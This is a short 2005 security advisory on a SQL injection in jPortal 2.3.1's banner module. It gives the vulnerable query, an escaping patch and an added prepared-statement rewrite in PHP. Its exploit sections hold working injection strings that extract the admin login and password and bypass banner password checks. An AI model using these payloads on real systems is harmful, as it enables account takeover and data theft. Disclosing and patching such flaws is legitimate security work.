SQL injection in jPortal version 2.3.1 (module banner)

2005-04-12T00:00:00
ID SECURITYVULNS:DOC:8292
Type securityvulns
Reporter Securityvulns
Modified 2005-04-12T00:00:00

Description

Hello BugTraq,

I've found a possibility to inject SQL code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php).

The bug is in this line of code (line 192):

[code] $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code]

The variable $haslo is used unfiltered. To patch this code, escape it before it is placed in the query:

[code] $haslo = addslashes($haslo); $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code]
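As an added example (not jPortal's own code), the same banner lookup rewritten with a PDO prepared statement: the title value is sent to the database separately from the SQL text, so no escaping step such as addslashes() is needed and the result does not depend on the connection charset. The table name cannot be bound as a parameter, so it is checked against a fixed allow-list instead; the function names, the allow-list entries and the sample rows are assumptions for this demonstration.

```php
<?php
// Added example, not jPortal code: the banner lookup from
// module/banner.inc.php rewritten with a PDO prepared statement.

// Table names the module is expected to query (assumed names). An identifier
// cannot be bound as a parameter, so it is validated against this list.
const BANNER_TABLES = ['banners', 'banners_archive'];

/**
 * Vulnerable form, as on the page: $haslo is concatenated into the SQL text,
 * so a single quote inside it changes the structure of the query.
 */
function bannerQueryUnsafe(string $bann_a_tbl, string $haslo): string
{
    return "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";
}

/**
 * Hardened form: the value travels as a bound parameter, never as SQL text.
 * Returns the matching rows; throws if the table name is not on the allow-list.
 */
function findBannersByTitle(PDO $db, string $bann_a_tbl, string $haslo): array
{
    if (!in_array($bann_a_tbl, BANNER_TABLES, true)) {
        throw new InvalidArgumentException("unexpected banner table: $bann_a_tbl");
    }
    $stmt = $db->prepare(
        "SELECT * FROM `$bann_a_tbl` WHERE title = :title ORDER BY id DESC"
    );
    $stmt->execute([':title' => $haslo]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demonstration on an in-memory SQLite database with constructed
// sample rows. The real module uses MySQL, where PDO behaves the same way; on
// MySQL also set PDO::ATTR_EMULATE_PREPARES to false so the server parses the
// statement before it ever receives the value.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE banners (id INTEGER PRIMARY KEY, title TEXT, pass TEXT)");
$db->exec("INSERT INTO banners (title, pass) VALUES ('promo', 'secret'), ('x''y', 'other')");

// A title containing a quote is matched literally instead of altering the query.
$rows = findBannersByTitle($db, 'banners', "x'y");
var_dump(count($rows) === 1 && $rows[0]['title'] === "x'y");   // bool(true)

// The same input in the unsafe builder produces a query with a different shape.
echo bannerQueryUnsafe('banners', "x'y"), "\n";
```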

[exploit] go to http://[victim]/jportal/banner.php and try this:

' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

and then:

' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

After that, you obtain the administrator's login and password. [/exploit]

[exploit2] try to inject this code: ' or id='x (x - banner id). After that, you can see statistics of banners for which you don't have the password. [/exploit2]

The vendor (http://jportal2.com) has already been informed.

-- Best regards, Marcin "CiNU5" Krupowicz